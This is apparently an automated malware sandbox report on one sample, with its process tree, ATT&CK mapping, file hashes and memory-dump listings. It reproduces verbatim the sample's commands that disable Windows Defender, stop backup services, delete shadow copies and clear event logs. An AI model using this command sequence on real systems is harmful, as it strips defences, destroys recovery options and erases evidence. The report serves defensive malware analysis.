PID 2012 wrote to memory of 4044	2012	net.exe	net1.exe
PID 2012 wrote to memory of 4044	2012	net.exe	net1.exe
PID 2388 wrote to memory of 644	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 644	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 644	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 644 wrote to memory of 4028	644	net.exe	net1.exe
PID 644 wrote to memory of 4028	644	net.exe	net1.exe
PID 644 wrote to memory of 4028	644	net.exe	net1.exe
PID 2388 wrote to memory of 4024	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 4024	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 4024	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 4024 wrote to memory of 2880	4024	net.exe	net1.exe
PID 4024 wrote to memory of 2880	4024	net.exe	net1.exe
PID 4024 wrote to memory of 2880	4024	net.exe	net1.exe
PID 2388 wrote to memory of 2888	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 2888	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 2888	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2888 wrote to memory of 2628	2888	net.exe	net1.exe
PID 2888 wrote to memory of 2628	2888	net.exe	net1.exe
PID 2888 wrote to memory of 2628	2888	net.exe	net1.exe
PID 2388 wrote to memory of 604	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 604	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 604	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 604 wrote to memory of 396	604	net.exe	net1.exe
PID 604 wrote to memory of 396	604	net.exe	net1.exe
PID 604 wrote to memory of 396	604	net.exe	net1.exe
PID 2388 wrote to memory of 676	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	sc.exe
PID 2388 wrote to memory of 676	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	sc.exe
PID 2388 wrote to memory of 676	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	sc.exe
PID 2388 wrote to memory of 3816	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	sc.exe
PID 2388 wrote to memory of 3816	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	sc.exe
PID 2388 wrote to memory of 3816	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	sc.exe
PID 2388 wrote to memory of 1076	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	sc.exe
PID 2388 wrote to memory of 1076	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	sc.exe
PID 2388 wrote to memory of 1076	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	sc.exe
PID 2388 wrote to memory of 960	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3680

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
3⤵
PID:2756

C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
3⤵
PID:4092

C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2752

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
3⤵
PID:1204

C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:824

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
3⤵
PID:3936

C:\Windows\SysWOW64\net.exe
net.exe stop "vmicvss" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
3⤵
PID:4044

C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
3⤵
PID:4028

C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:4024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
3⤵
PID:2880

C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
3⤵
PID:2628

C:\Windows\SysWOW64\net.exe
net.exe stop "UnistoreSvc_13aa2" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_13aa2" /y
3⤵
PID:396

C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
2⤵
PID:676

C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
2⤵
PID:3816

C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
2⤵
PID:1076

C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
2⤵
PID:960

C:\Windows\SysWOW64\sc.exe
sc.exe config "vmicvss" start= disabled
2⤵
PID:1356

C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
2⤵
PID:1504

C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
2⤵
PID:1912

C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
2⤵
PID:1988

C:\Windows\SysWOW64\sc.exe
sc.exe config "UnistoreSvc_13aa2" start= disabled
2⤵
PID:2128

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2536

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
2⤵
PID:3052

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
2⤵
PID:1796

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
2⤵
PID:1272

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
2⤵
PID:1056

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
2⤵
PID:2148

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
2⤵
PID:3208

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
2⤵
PID:3508

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
2⤵
PID:3192

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
2⤵
PID:3772

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
2⤵
PID:3832

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
2⤵
PID:3580

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
2⤵
PID:3632

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
2⤵
PID:1208

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:3480

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:2436

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
2⤵
PID:2180

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
2⤵
PID:3432

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
2⤵
PID:2880

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
2⤵
PID:1096

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
2⤵
PID:608

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
2⤵
PID:1200

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
2⤵
PID:712

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
2⤵
PID:3708

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:3528

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:2736

C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:1700

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2136

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:3260

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2980

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4048

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:924

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2336

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:3700

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2972

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2756

C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200

C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3980

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
2⤵
PID:3668

C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
3⤵
- Deletes Windows Defender Definitions
PID:1232

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:1316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1408

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:3228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1072

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

1

T1562

Modify Registry

1

T1112

Disabling Security Tools

1

T1089

Indicator Removal on Host

1

T1070

File Deletion

2

T1107

Credential Access

Credentials in Files

1

T1081

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d67c2bfdde22b63cbfd721f8e58d37fc

SHA1
0856cffcd7559c6ac82d3de762da7958a40ff7ee

SHA256
c465cb0978aca6fb4189f88989f35a7b70bced6146e406343e3e8311b1cfc287

SHA512
05206d9e8dfface0e5e7a1827316c01c6928a645023638ff99668980b79fc3546b46974fbec4a2b6ae6674ba2c6b807d2782b59dd91c2070b6820a7bfe5462c5

Download Submit
memory/396-135-0x0000000000000000-mapping.dmp

Download
memory/604-134-0x0000000000000000-mapping.dmp

Download
memory/608-165-0x0000000000000000-mapping.dmp

Download
memory/644-128-0x0000000000000000-mapping.dmp

Download
memory/676-136-0x0000000000000000-mapping.dmp

Download
memory/712-167-0x0000000000000000-mapping.dmp

Download
memory/824-124-0x0000000000000000-mapping.dmp

Download
memory/924-176-0x0000000000000000-mapping.dmp

Download
memory/960-139-0x0000000000000000-mapping.dmp

Download
memory/984-120-0x0000000000000000-mapping.dmp

Download
memory/1056-149-0x0000000000000000-mapping.dmp

Download
memory/1072-442-0x0000000004A20000-0x0000000004A21000-memory.dmp

Filesize
4KB

Download
memory/1072-443-0x0000000004A22000-0x0000000004A23000-memory.dmp

Filesize
4KB

Download
memory/1072-457-0x0000000004A23000-0x0000000004A24000-memory.dmp

Filesize
4KB

Download
memory/1072-456-0x000000007E9B0000-0x000000007E9B1000-memory.dmp

Filesize
4KB

Download
memory/1076-138-0x0000000000000000-mapping.dmp

Download
memory/1096-164-0x0000000000000000-mapping.dmp

Download
memory/1200-166-0x0000000000000000-mapping.dmp

Download
memory/1204-123-0x0000000000000000-mapping.dmp

Download
memory/1208-158-0x0000000000000000-mapping.dmp

Download
memory/1272-148-0x0000000000000000-mapping.dmp

Download
memory/1356-140-0x0000000000000000-mapping.dmp

Download
memory/1408-184-0x0000000003720000-0x0000000003721000-memory.dmp

Filesize
4KB

Download
memory/1408-193-0x00000000089A0000-0x00000000089A1000-memory.dmp

Filesize
4KB

Download
memory/1408-190-0x00000000079F0000-0x00000000079F1000-memory.dmp

Filesize
4KB

Download
memory/1408-189-0x0000000007BD0000-0x0000000007BD1000-memory.dmp

Filesize
4KB

Download
memory/1408-188-0x0000000007950000-0x0000000007951000-memory.dmp

Filesize
4KB

Download
memory/1408-209-0x0000000009780000-0x0000000009781000-memory.dmp

Filesize
4KB

Download
memory/1408-202-0x00000000099A0000-0x00000000099D3000-memory.dmp

Filesize
204KB

Download
memory/1408-195-0x00000000034C0000-0x00000000034C1000-memory.dmp

Filesize
4KB

Download
memory/1408-187-0x0000000007612000-0x0000000007613000-memory.dmp

Filesize
4KB

Download
memory/1408-186-0x0000000007610000-0x0000000007611000-memory.dmp

Filesize
4KB

Download
memory/1408-185-0x0000000007C50000-0x0000000007C51000-memory.dmp

Filesize
4KB

Download
memory/1408-192-0x00000000082A0000-0x00000000082A1000-memory.dmp

Filesize
4KB

Download
memory/1408-182-0x00000000034C0000-0x00000000034C1000-memory.dmp

Filesize
4KB

Download
memory/1408-191-0x00000000082F0000-0x00000000082F1000-memory.dmp

Filesize
4KB

Download
memory/1408-285-0x0000000007613000-0x0000000007614000-memory.dmp

Filesize
4KB

Download
memory/1408-284-0x000000007F120000-0x000000007F121000-memory.dmp

Filesize
4KB

Download
memory/1408-215-0x0000000009CB0000-0x0000000009CB1000-memory.dmp

Filesize
4KB

Download
memory/1408-194-0x0000000008A70000-0x0000000008A71000-memory.dmp

Filesize
4KB

Download
memory/1408-183-0x00000000034C0000-0x00000000034C1000-memory.dmp

Filesize
4KB

Download
memory/1408-214-0x0000000009AF0000-0x0000000009AF1000-memory.dmp

Filesize
4KB

Download
memory/1504-141-0x0000000000000000-mapping.dmp

Download
memory/1700-171-0x0000000000000000-mapping.dmp

Download
memory/1796-147-0x0000000000000000-mapping.dmp

Download
memory/1912-142-0x0000000000000000-mapping.dmp

Download
memory/1988-143-0x0000000000000000-mapping.dmp

Download
memory/2012-126-0x0000000000000000-mapping.dmp

Download
memory/2128-144-0x0000000000000000-mapping.dmp

Download
memory/2136-172-0x0000000000000000-mapping.dmp

Download
memory/2148-150-0x0000000000000000-mapping.dmp

Download
memory/2180-161-0x0000000000000000-mapping.dmp

Download
memory/2336-177-0x0000000000000000-mapping.dmp

Download
memory/2416-180-0x0000000000000000-mapping.dmp

Download
memory/2436-160-0x0000000000000000-mapping.dmp

Download
memory/2536-145-0x0000000000000000-mapping.dmp

Download
memory/2628-133-0x0000000000000000-mapping.dmp

Download
memory/2736-170-0x0000000000000000-mapping.dmp

Download
memory/2752-122-0x0000000000000000-mapping.dmp

Download
memory/2756-181-0x0000000000000000-mapping.dmp

Download
memory/2756-119-0x0000000000000000-mapping.dmp

Download
memory/2880-163-0x0000000000000000-mapping.dmp

Download
memory/2880-131-0x0000000000000000-mapping.dmp

Download
memory/2888-132-0x0000000000000000-mapping.dmp

Download
memory/2972-179-0x0000000000000000-mapping.dmp

Download
memory/2980-174-0x0000000000000000-mapping.dmp

Download
memory/3052-146-0x0000000000000000-mapping.dmp

Download
memory/3192-153-0x0000000000000000-mapping.dmp

Download
memory/3208-151-0x0000000000000000-mapping.dmp

Download
memory/3260-173-0x0000000000000000-mapping.dmp

Download
memory/3432-162-0x0000000000000000-mapping.dmp

Download
memory/3480-159-0x0000000000000000-mapping.dmp

Download
memory/3508-152-0x0000000000000000-mapping.dmp

Download
memory/3528-169-0x0000000000000000-mapping.dmp

Download
memory/3580-156-0x0000000000000000-mapping.dmp

Download
memory/3632-157-0x0000000000000000-mapping.dmp

Download
memory/3680-118-0x0000000000000000-mapping.dmp

Download
memory/3700-178-0x0000000000000000-mapping.dmp

Download
memory/3708-168-0x0000000000000000-mapping.dmp

Download
memory/3772-154-0x0000000000000000-mapping.dmp

Download
memory/3816-137-0x0000000000000000-mapping.dmp

Download
memory/3832-155-0x0000000000000000-mapping.dmp

Download
memory/3936-125-0x0000000000000000-mapping.dmp

Download
memory/4024-130-0x0000000000000000-mapping.dmp

Download
memory/4028-129-0x0000000000000000-mapping.dmp

Download
memory/4044-127-0x0000000000000000-mapping.dmp

Download
memory/4048-175-0x0000000000000000-mapping.dmp

Download
memory/4092-121-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads